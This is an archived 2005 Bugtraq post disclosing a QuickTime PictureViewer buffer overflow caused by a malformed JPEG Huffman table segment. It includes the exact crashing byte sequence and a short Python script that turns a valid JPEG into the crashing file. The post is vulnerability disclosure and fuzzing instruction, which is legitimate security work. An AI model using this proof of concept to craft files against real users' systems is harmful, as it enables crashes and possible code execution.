lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 26 Mar 2005 23:08:48 -0000
From: <liquid@...erspace.org>
To: bugtraq@...urityfocus.com
Subject: QuickTime malformed JPEG buffer overflow




When fuzzing some application with malformed input files, if we want to discover some vulnerability we have to create input file which is very close to valid file but yet malformed in some way. In that way chances for discovery are greater.
Now let's play with JPEG format. We concentrate on Huffman table segment. Marker for DHT is 0xffc4. 

Now, take valid JPEG file and replace first DHT with this malformed DHT:

0xffc4021100ffff000000000000+0x01*510

Open this modified file with QuickTime PictureViewer (version 6.5.1) for Windows and QuickTime will crash with Windows reporting access violation error. Next step would be creating exploit, but I leave that to people with more skill in doing that.

Here is quick and dirty script in Python for creating such malformed file:

import struct
f=open(raw_input("enter the path to the input file:\n"),"rb")
a=f.read()
f.close()
n=a.index("\xff\xc4")
b=a[:n]+"\xff\xc4\x02\x11\x00\xff\xff"+"\x00"*14+"\x01"*510
+a[n+2+struct.unpack("!H",a[n+2:n+4])[0]:]
f=open(raw_input("enter the path to the output file:\n"),"wb")
f.write(b)
f.close()

For details about JPEG format take a look at:

http://www.w3.org/Graphics/JPEG/itu-t81.pdf

Powered by blists - more mailing lists